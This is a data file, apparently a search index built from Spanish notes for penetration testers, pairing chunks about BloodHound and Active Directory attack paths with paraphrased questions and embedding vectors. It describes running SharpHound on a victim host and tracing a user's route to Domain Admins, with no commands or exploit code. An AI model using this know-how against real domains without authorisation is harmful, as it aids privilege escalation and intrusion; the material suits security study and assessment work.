"apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### QuΓ© hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, mΓ‘quinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"ΒΏCuΓ‘l es el camino mΓ‘s corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **dΓ­as** de mirar listados de grupos a mano.", "indexar": "que programa dibuja Active Directory como un grafo para que vea las relaciones entre nodos fΓ‘cilmente?", "v": [-0.1928, 0.07557, -0.03126, -0.17909, 0.0469, -0.01705, -0.01577, 0.05819, -0.03855, 0.01036, 0.12224, -0.1086, -0.16693, -0.07549, 0.10177, -0.0685, 0.0937, -0.10535, -0.0772, -0.04178, -0.04591, 0.04684, 0.06824, -0.01347, -0.00772, -0.03942, 0.076, -0.01997, 0.03551, 0.06949, 0.04781, -0.05596, 0.10148, -0.17966, -0.02021, -0.00401, 0.05819, 0.01854, 0.10521, 0.05537, -0.11583, -0.0913, -0.07807, -0.01527, 0.06321, 0.05356, -0.0265, -0.04293, -0.03728, 0.04088, -0.10377, -0.0386, -0.04444, 0.00376, 0.07046, -0.06407, 0.00279, -0.1218, -0.05226, -0.04335, -0.00084, -0.01932, -0.00782, -0.12683, -0.00468, -0.00704, 0.14516, -0.10406, -0.05803, 0.06005, 0.05301, 0.03099, -0.03662, 0.10644, 0.044, 0.03783, -0.02074, -0.04217, -0.05135, 0.02273, 0.0026, -0.02622, 0.02659, 0.14615, -0.1202, -0.06691, 0.05672, 0.01046, -0.05826, 0.04191, 0.01919, 0.05814, -0.07408, 0.06251, 0.12433, 0.02183, -0.03404, 0.03369, 0.13499, -0.03182, 0.05427, 0.00635, -0.10223, 0.06109, -0.08767, 0.06539, 0.02487, 0.14524, -0.08272, 0.16192, 0.05229, 0.06614, 0.05161, -0.07671, -0.05965, 0.08239, -0.00628, -0.01029, 0.02836, -0.1146, -0.12405, -0.04743, 0.07406, 0.09405, -0.05984, -0.00073, -0.026, 0.08979, -0.0007, 0.14939, -0.08566, 0.0771, -0.0259, -0.14955, -0.05942, -0.06708, 0.00836, 0.02753, 0.07146, -0.10449, 0.00913, 0.02407, 0.09161, 0.00028, -0.006, -0.00093, 0.0148, -0.03379, -0.0184, 0.04451, -0.06064, 0.00451, 0.01207, 0.009, -0.01736, -0.00206, -0.02584, -0.02648, -0.00514, 0.01111, -0.066, -0.01733, 0.07044, -0.00703, 0.07021, -0.00162, -0.15357, 0.01155, 0.00406, 0.09354, -0.04017, 0.0925, -0.00614, -0.09073, 0.02837, 0.01105, 0.02659, -0.05258, -0.01924, -0.01678, 0.00954, 0.00469, 0.02181, 0.04848, -0.04463, -0.0631, -0.0021, -0.02162, 0.03621, -0.04343, -0.00503, 0.03027, -0.02353, 5e-05, -0.01084, -0.06506, 0.01715, 0.03337, -0.00516, 0.0164, 0.03202, -0.04782, 0.07572, -0.01483, 0.03609, 0.08732, -0.05167, 0.03342, 0.06018, 0.02368, -0.0501, 0.01331, 0.04216, 0.0633, -0.05479, 0.00109, -0.00699, 0.05355, 0.06311, 0.0088, 0.02971, 0.04266, 0.01744, 0.00226, 0.04064, -0.09936, 0.02239, 0.03327, 0.01615, -0.03255, 0.00224, -0.03544, 0.01644, -0.05238, 0.05008, 0.02496, 0.02835, -0.08469, 0.00296, -0.06217, 0.06232, 0.05376, 0.0195, -0.01019, -0.04457, -0.03484, -0.02768, 0.0158, 0.01197, -0.04724, 0.00695, 0.02162, 0.04149, -0.02999, 0.0061, 0.00238]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β” MemberOf β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ juan β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ HelpDesk β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ AdminTo\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ workstation42β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ HasSession (admin con sesiΓ³n activa aquΓ­)\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ ana β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ MemberOf\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Domain Adminsβ”‚ ← jackpot\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual es una herramienta para verificar si un usuario tiene sesiΓ³n activa?", "v": [-0.09076, 0.13827, -0.25181, -0.15242, 0.06344, -0.17453, -0.1341, -0.09777, 0.01657, -0.13037, -0.10028, -0.08121, -0.06411, -0.04662, 0.09811, 0.003, 0.06209, -0.10697, 0.06189, 0.04833, 0.06154, -0.00416, -0.04092, -0.02677, -0.07087, 0.08325, 0.04915, -0.06868, -0.07972, -0.04096, 0.06039, -0.04183, 0.06317, -0.08716, -0.07024, -0.02747, -0.01397, 0.01061, 0.04897, 0.14248, -0.04755, 0.12038, -0.07383, 0.01432, 0.06013, 0.10708, -0.04954, -0.00685, -0.05025, 0.03627, 0.01383, -0.02707, -0.12391, 0.02874, -0.08165, -0.13766, 0.16889, -0.12669, 0.07341, -0.12488, -0.07614, -0.00385, -0.02867, 0.02071, -0.02476, -0.02673, 0.09728, -0.03412, -0.00968, 0.07325, -0.02389, 0.0309, -0.03649, -0.01533, 0.04399, -0.02921, 0.05758, -0.02719, 0.08798, -0.00598, 0.05742, -0.01975, 0.00721, 0.01062, -0.201, -0.09913, 0.08544, -0.05734, 0.03605, -0.07054, -0.02078, 0.09368, 0.00703, -0.01144, 0.01636, 0.02257, 0.05599, 0.00374, -0.01853, 0.04994, 0.17382, -0.01713, -0.07684, 0.11232, -0.03416, -0.05804, -0.08407, -0.00313, -0.09096, -0.06554, 0.05433, 0.00733, -0.08454, -0.03982, 0.01964, 0.11153, -0.09084, -0.14885, -0.01474, -0.02698, -0.00372, 0.04893, -0.0701, -0.07137, 0.0142, -0.01524, 0.00064, 0.05047, -0.01922, -0.03261, -0.0169, -0.0529, -0.05714, -0.01433, -0.07577, -0.03394, 0.007, -0.10209, -0.06373, -0.04136, 0.02566, 0.07692, 0.01132, -0.07615, 0.10927, 0.02376, -0.01489, -0.01545, -0.10158, 0.06708, 0.031, -0.07718, 0.04507, 0.07835, -0.03511, 0.04341, -0.03464, -0.0141, -0.01087, 0.04805, -0.01308, -0.05678, 0.04808, -0.04467, 0.02217, -0.06826, -0.04339, 0.00427, 0.05814, 0.02652, 0.00607, -0.01946, 0.02056, -0.06167, 0.04055, -0.05384, -0.04336, -0.00243, 0.01973, -0.10154, -0.04926, -0.01816, -0.01999, -0.04286, -0.04355, -0.03867, 0.02599, 0.01391, 0.01919, 0.03703, 0.02651, 0.07603, -0.01663, -0.04369, 0.04384, 0.00279, -0.00496, -0.06398, 0.02765, -0.03305, -0.02314, -0.01211, -0.03469, -0.05082, 0.04331, 0.0307, -0.02851, -0.03225, 0.02295, -0.008, 0.01063, 0.02025, 0.09147, -0.0312, -0.03959, -0.04176, 0.00143, 0.00048, -0.03666, -0.03168, 0.01595, 0.03062, 0.04355, 0.00966, 0.01585, 0.03523, 0.01909, 0.02672, -0.00749, 0.03697, 0.02299, 0.00465, -0.01491, 0.01127, 0.07135, 0.0006, 0.07512, -0.00486, -0.02224, -0.04448, 0.01368, 0.07173, 0.00578, -0.03369, 0.01609, 0.02652, -0.06275, -0.01473, -0.04867, -0.09025, -0.01821, 0.01457, 0.09012, -0.05234, 0.04508, -0.06342]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β” MemberOf β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ juan β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ HelpDesk β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ AdminTo\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ workstation42β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ HasSession (admin con sesiΓ³n activa aquΓ­)\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ ana β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ MemberOf\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Domain Adminsβ”‚ ← jackpot\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que puedo saber si una persona pertenece a los administradores de dominio?", "v": [0.05422, 0.20942, -0.01087, -0.0584, -0.02577, -0.00902, 0.09955, -0.09472, -0.21232, 0.01152, 0.01892, -0.06547, 0.03164, -0.13959, 0.10263, -0.03093, 0.22415, 0.03324, -0.01282, 0.04996, 0.10185, -0.00636, 0.0799, 0.064, -0.05082, -0.04997, 0.12188, -0.08641, -0.00411, 0.09696, 0.03909, -0.02776, -0.02035, 0.0011, 0.09844, 0.00511, -0.10752, 0.07736, 0.0146, 0.17899, 0.01936, -0.00303, -0.10491, 0.0183, -0.0403, 0.06643, -0.15827, -0.10047, 0.081, -0.07744, -0.05217, -0.0409, -0.13571, -0.04706, 0.03308, -0.00802, 0.10424, -0.04283, 0.083, 0.00295, -0.09804, -0.03452, 0.00978, 0.10395, -0.0876, -0.07472, 0.05723, 0.02906, -0.04118, -0.01896, -0.00431, -0.02402, -0.08009, 0.03677, 0.03187, 0.04055, 0.07937, 0.02072, 0.12635, -0.06432, 0.01049, 0.01395, -0.11232, -0.04623, -0.09664, -0.1153, -0.08844, -0.14081, 0.03311, -0.00474, 0.0101, 0.01103, -0.0397, -0.07388, -0.09532, 0.04555, 0.05337, 0.00825, -0.06797, 0.02604, 0.06014, 0.12781, -0.09125, 0.10002, 0.03396, 0.12238, 0.0838, -0.10335, 0.02179, -0.01085, -0.04645, -0.00624, -0.11635, -0.00252, -0.03999, 0.0725, -0.10397, 0.03082, 0.052, 0.00885, -0.11684, -0.11601, 0.09094, 0.01739, 0.05997, -0.01469, 0.01876, 0.06598, -0.01377, -0.08713, -0.06148, -0.00595, -0.00169, -0.03877, -0.03713, 0.04299, -0.04265, 0.06571, 0.04796, -0.00311, -0.07227, 0.01986, -0.05388, -0.01195, 0.08952, -0.04499, -0.02499, -0.12667, 0.01051, -0.03126, -0.04256, 0.00177, 0.00233, 0.07377, 0.01009, 0.04279, 0.00508, -0.02692, 0.05414, 0.04381, 0.03514, 0.00852, -0.06892, 0.05363, 0.02284, -0.0359, -0.00212, -0.01305, 0.03204, 0.01676, -0.088, -0.01009, 0.00424, 0.04644, -0.01461, -0.07129, -0.03307, -0.03834, 0.0054, -0.0162, 0.02574, -0.03462, -0.02225, 0.05781, -0.08857, 0.03683, 0.02477, 0.03732, -0.0529, 0.04295, 0.04345, 0.05013, -0.03739, 0.01517, -0.00023, -0.01761, -0.0059, 0.03802, -0.03228, -0.04275, -0.015, -0.04523, -0.00077, 0.04061, -0.02533, 0.00951, 0.00347, 0.03806, 0.03531, 0.02674, 0.00113, -0.00809, 0.04551, -0.04551, -0.05104, 0.00563, 0.05654, 0.01351, 0.02395, -0.02366, -0.02445, 0.033, 0.0674, -0.03312, 0.07074, -0.01187, 0.03014, 0.00741, 0.01076, 0.06111, -0.06555, 0.04516, 0.05909, -0.04106, 0.07456, 0.01123, 0.05946, -0.09743, -0.03972, 0.02379, -0.02227, 0.03781, 0.02844, -0.05099, -0.03539, -0.08105, -0.058, 0.04312, -0.06585, -0.05404, 0.00191, 0.04225, 0.02208, 0.02965, -0.01694, -0.00779]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β” MemberOf β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ juan β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ HelpDesk β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ AdminTo\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ workstation42β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ HasSession (admin con sesiΓ³n activa aquΓ­)\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ ana β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ MemberOf\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Domain Adminsβ”‚ ← jackpot\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que programa sirve para detectar si alguien ha iniciado sesiΓ³n en una estaciΓ³n de trabajo?", "v": [-0.01225, 0.14459, -0.231, -0.27229, 0.00696, -0.17922, -0.0966, -0.04831, -0.00203, -0.05994, -0.1106, 2e-05, -0.07208, -0.04976, 0.15992, 0.04304, 0.09285, 0.02655, 0.07095, -0.05799, -0.06527, 0.11399, 0.05535, 0.02093, 0.00634, -0.00469, -0.00491, -0.07431, -0.06274, -0.03046, 0.00659, -0.11704, 0.09099, -0.0721, 0.05613, -0.16398, -0.09101, -0.01773, 0.02485, 0.11318, 0.0272, 0.04221, -0.00241, -0.03563, 0.15955, 0.04624, 0.00828, -0.03689, -0.02874, 0.04958, 0.0314, 0.01962, 0.01963, -0.08193, -0.04717, -0.00745, 0.0873, -0.02318, 0.04855, -0.00457, -0.02599, 0.091, 0.01432, -0.05274, 0.0852, 0.01859, 0.08997, 0.02454, -8e-05, -0.03404, -0.09899, -0.01456, 0.05662, -0.00489, 0.12142, -0.01435, -0.01305, -0.04711, 0.08739, -0.05994, -0.02645, 0.10235, 0.06927, 0.1047, -0.09821, 0.01291, 0.0968, 0.00153, -0.06443, -0.03184, -0.06748, 0.11259, -0.00375, -0.0197, 0.10584, 0.01459, 0.06836, 0.03631, 0.01377, 0.04577, 0.1169, -0.06529, -0.0071, 0.05616, -0.02954, 0.06856, 0.02286, 0.01914, -0.02059, -0.03492, -0.03092, -0.02421, 0.04825, -0.06849, -0.08646, 0.01692, 0.00925, -0.02164, -0.02322, -0.00095, -0.14391, 0.01935, 0.01298, -0.02303, 0.04885, -0.14179, 0.01674, 0.05125, 0.04566, 0.0957, -0.03003, 0.06673, -0.07601, -0.07363, -0.08849, -0.01312, 0.01081, -0.06064, -0.06929, -0.04724, 0.01864, 0.14309, 0.04116, 0.0061, 0.09406, 0.06776, 0.05632, -0.07211, -0.03493, 0.02274, 0.00253, -0.02397, 0.04627, 0.03161, -0.07599, -0.03436, 0.10954, -0.06486, -0.00707, 0.11216, -0.01425, -0.01547, -0.06088, -0.03472, 0.04984, -0.02391, -0.04857, -0.02044, 0.10223, 0.03903, -0.02405, -0.00815, 0.06183, -0.07115, 0.02772, 0.02376, 0.00306, -0.03808, 0.10153, -0.005, -0.09887, -0.00707, 0.06549, -0.03464, -0.01341, 0.00701, 0.00071, -0.02414, -0.01246, 0.01239, 0.05589, -0.02276, -0.05182, 0.00033, 0.04043, 0.00716, 0.01734, -0.02824, 0.02679, 0.01623, -0.02442, -0.00937, -0.05791, 0.05494, 0.01367, -0.00802, -0.03224, 0.00213, 0.03428, 0.08774, 0.01131, -0.02231, 0.04837, -0.05124, -0.04718, -0.02274, 0.0603, -0.01906, 0.01556, 0.0454, -0.01981, 0.01909, 0.01465, 0.05125, -0.03547, -0.08855, 0.05243, -0.02518, 0.09597, 0.06943, 0.03346, -0.01867, -0.0132, -0.03733, -0.00953, -0.04367, 0.02615, -0.0002, -0.048, -0.09544, 0.00626, 0.05639, -0.03934, -0.06386, 0.01183, 0.0156, 0.02921, -0.00948, -0.02412, 0.01893, -0.04653, 0.03459, 0.09056, -0.04661, 0.09416, 0.00215]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Componentes\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ SharpHound (.exe)β”‚ o β”‚ bloodhound-pythonβ”‚ ────► β”‚ JSON files β”‚\n β”‚ corre en vΓ­ctima β”‚ β”‚ corre en Kali β”‚ β”‚ con datos ADβ”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ BloodHound GUI β”‚\n β”‚ (en tu Kali) β”‚\n β”‚ + β”‚\n β”‚ Neo4j (base BD) β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que herramienta sirve para mapear dominios de Active Directory desde una vΓ­ctima?", "v": [0.04928, 0.04462, -0.06109, -0.19413, -0.068, -0.07798, -0.05145, -0.0119, -0.08365, 0.05128, 0.11273, -0.15725, -0.01103, -0.14163, 0.01644, -0.04657, 0.23747, -0.05844, -0.04232, -0.0717, -0.0219, 0.02932, -0.06121, 0.03993, -0.05213, 0.00099, 0.02101, -0.1273, -0.14928, 0.08266, 0.01362, -0.04749, -0.02948, -0.05683, 0.00468, -0.21545, -0.0827, -0.01076, 0.07547, 0.08495, 0.02979, -0.01762, -0.1589, 0.07083, -0.04491, 0.07747, -0.08001, -0.06549, 0.09577, 0.08003, -0.07452, -0.13195, -0.16375, -0.08608, 0.0505, -0.04835, 0.12405, -0.09663, 0.06162, -0.13488, -0.12015, -0.09009, -0.0453, -0.05805, -0.02399, -0.12949, 0.12674, -0.04045, -0.08578, 0.06407, 0.01037, 0.03457, 0.0998, 0.07788, 0.00942, -0.12036, 0.08778, -0.05145, -0.03536, 0.03306, 0.12097, -0.01655, -0.1395, 0.02744, -0.07463, -0.08877, 0.01824, -0.05543, 0.0755, -0.09361, 0.05372, 0.09111, -0.02964, 0.0413, -0.00615, -0.05392, 0.05203, -0.05108, 0.01346, -0.05159, 0.1593, -0.02346, -0.0259, 0.0716, 0.10274, 0.01753, -0.07797, 0.07098, -0.12878, 0.04163, 0.04067, 0.00225, 0.02057, -0.03826, 0.00336, 0.10268, -0.05193, -0.02516, 0.0447, 0.02684, 0.01749, 0.03414, 0.02005, 7e-05, -0.02197, 0.03922, -0.04872, -0.02107, 0.01655, -0.08093, 0.05787, 0.02096, -0.0033, -0.00532, -0.00641, 0.03248, 0.05987, -0.03521, 0.01128, -0.03643, -0.02596, 0.00792, -0.07049, -0.03618, -0.04485, -0.04558, 0.08291, -0.00415, -0.02312, 0.01586, 0.04221, -0.02556, -0.02406, 0.00898, -0.00343, 0.06167, -0.08525, -0.00249, -0.07674, 0.02589, -0.03892, -0.00675, -0.00599, 0.04668, 0.01919, -0.05635, 0.026, -0.00555, 0.11363, 0.10931, 0.01559, 0.03947, 0.0358, -0.03336, -0.03924, -0.06514, -0.01344, 0.04659, -0.00747, -0.02516, -0.00306, -0.04484, -0.02468, 0.063, -0.0097, 0.03302, 0.04012, -0.03859, -0.01633, 0.01056, 0.00358, 0.08477, 0.01902, -0.02683, -0.01468, -0.05484, 0.01449, 0.02754, -0.05914, -0.04611, -0.04271, 0.03366, 0.00338, -0.03009, 0.00088, 0.06299, 0.00675, -0.00744, 0.02334, -0.01539, -0.06311, 0.02487, 0.03981, -0.01411, -0.01567, -0.01373, 0.02464, 0.01808, -0.01794, -0.01181, -0.05186, -0.02315, -0.01902, -0.04107, 0.03839, 0.0622, 0.01301, 0.00064, -0.00715, -0.02331, 0.0298, -0.02566, 0.02172, -0.01585, -0.00293, -0.06139, 0.03577, -0.01701, -0.04949, 0.00015, -0.04342, 0.02737, 0.01956, 0.0116, -0.05675, -0.026, 0.02959, -0.02485, -0.03279, -0.0641, -0.00222, -0.00018, 0.05677, -0.04205, -0.04183, -0.02739]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Componentes\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ SharpHound (.exe)β”‚ o β”‚ bloodhound-pythonβ”‚ ────► β”‚ JSON files β”‚\n β”‚ corre en vΓ­ctima β”‚ β”‚ corre en Kali β”‚ β”‚ con datos ADβ”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ BloodHound GUI β”‚\n β”‚ (en tu Kali) β”‚\n β”‚ + β”‚\n β”‚ Neo4j (base BD) β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que puedo montar un anΓ‘lisis completo del dominio usando BloodHound y Neo4j?", "v": [-0.18535, 0.0113, -0.11225, -0.01004, -0.18003, 0.06965, -0.01882, 0.00282, -0.19468, -0.04609, -0.01749, -0.13089, -0.01305, -0.06521, -0.06948, -0.04431, 0.02176, -0.09771, -0.03807, 0.06712, -0.12476, -0.11992, -0.07288, -0.05275, 0.01715, 0.08821, -0.00839, 0.01455, -0.07654, 0.06492, -0.00105, -0.06855, 0.07966, -0.00015, -0.01931, -0.12534, -0.00495, 0.0042, -0.00972, 0.09739, 0.0137, -0.01212, -0.0606, 0.00871, 0.0142, 0.03903, -0.09294, -0.10609, 0.02417, -0.02596, 0.16504, 0.01879, -0.20079, -0.06139, -0.0492, -0.09063, 0.1371, -0.05216, 0.07427, -0.13969, -0.03182, -0.01331, 0.10653, 0.038, -0.05161, -0.14443, -0.06438, 0.03757, -0.01847, 0.04142, 0.01258, 0.03767, -0.01962, -0.02676, -0.01256, 0.00649, 0.07215, -0.0072, 0.09587, -0.01243, 0.01671, 0.02678, -0.04753, -0.00348, -0.11015, -0.03904, 0.0078, -0.12532, 0.04087, 0.09918, 0.09127, -0.04045, -0.04228, -0.03928, -0.05597, -0.04922, 0.0569, -0.00675, 0.06659, -0.04641, 0.10906, 0.114, -0.07799, 0.14091, 0.12302, 0.0593, -0.01534, -0.13479, 0.00782, -0.02149, -0.01516, 0.02455, -0.16069, -0.00926, -0.03768, -0.09028, 0.02703, 0.05395, 0.04282, -0.04229, -0.06399, 0.05049, 0.03488, 0.06733, -0.0952, -0.02975, -0.01553, 0.05259, -0.02075, -0.09864, -0.03052, 0.05593, -0.05684, -0.0634, -0.05577, 0.04212, 0.00701, 0.03389, -0.03247, -0.04368, -0.02255, -0.01574, 0.03284, 0.02175, -0.00807, -0.00408, 0.02953, -0.13679, 0.00284, 0.0521, 0.05277, 0.06852, -0.0074, 0.03249, -0.05504, -0.05177, -0.00498, -0.01794, 0.00227, 0.07284, -0.02866, -0.01036, -0.03285, 0.02492, -0.05388, 0.08303, -0.0459, -0.03005, -0.04352, -0.00404, 0.00451, -0.01201, 0.01913, 0.04809, 0.02237, -0.02832, 0.00562, -0.03208, -0.03352, -0.00626, -0.01865, -0.04765, -0.03528, 0.01364, -0.0591, 0.03536, 0.04811, -0.02502, 0.03031, 0.03223, 0.09371, 0.08288, 0.04586, 0.0173, 0.00864, -0.00982, 0.03517, -0.07277, -0.01008, 0.00751, -0.03216, -0.01259, -0.05233, 0.01557, -0.03275, 0.01101, -0.04208, 0.07784, -0.04362, 0.05731, -0.01096, -0.07339, 0.02363, -0.08173, -0.04222, -0.00299, 0.03175, -0.00465, -0.09626, 0.00431, -0.01045, 0.09162, 0.02809, -0.02214, -0.02824, 0.01139, 0.03319, -0.0717, 0.12855, -0.00366, -0.06704, 0.08573, -0.03192, 0.01118, -0.00472, 0.0453, 0.04892, 0.00329, -0.04786, 0.01924, 0.08454, 0.06759, -0.06174, -0.08066, -0.04877, -0.10686, -0.0753, 0.07897, 0.01888, -0.00892, 0.04483, 0.02832, 0.04998, -0.0283, 0.00607, -0.00146]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Componentes\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ SharpHound (.exe)β”‚ o β”‚ bloodhound-pythonβ”‚ ────► β”‚ JSON files β”‚\n β”‚ corre en vΓ­ctima β”‚ β”‚ corre en Kali β”‚ β”‚ con datos ADβ”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ BloodHound GUI β”‚\n β”‚ (en tu Kali) β”‚\n β”‚ + β”‚\n β”‚ Neo4j (base BD) β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual es la alternativa libre a SharpHound para hacer mapeo AD en Kali?", "v": [-0.25096, -0.04997, 0.03379, 0.05894, -0.17889, -0.07692, -0.00103, -0.02577, -0.1947, 0.10154, -0.03453, -0.24352, -0.02022, -0.05131, 0.10617, 0.04214, 0.01994, -0.06939, 0.11716, 0.08482, 0.02559, 0.07319, -0.14433, -0.06712, -0.10605, -0.05778, 0.03373, 0.07198, -0.18646, -0.06457, -0.0258, 0.04686, -0.02659, 0.08537, -0.06894, -0.04623, 0.15022, 3e-05, 0.02948, 0.04582, 0.00588, 0.01831, -0.06313, -0.03538, 0.06125, -0.01398, 0.01727, 0.1254, 0.01861, 0.19543, -0.05794, 0.04212, -0.11187, -0.0527, 0.13891, 0.02413, 0.05602, -0.10135, -0.08706, -0.10732, -0.08885, -0.02245, 0.01403, -0.06992, 0.0951, -0.05029, -0.01219, 0.04991, -0.04342, 0.1015, 0.02351, 0.0191, 0.05687, 0.01446, -0.14091, -0.02988, -0.06641, -0.05864, 0.02367, 0.06573, 0.03114, -0.06978, -0.05207, -0.00021, -0.07514, -0.10227, 0.0578, -0.08154, 0.00104, 0.06822, 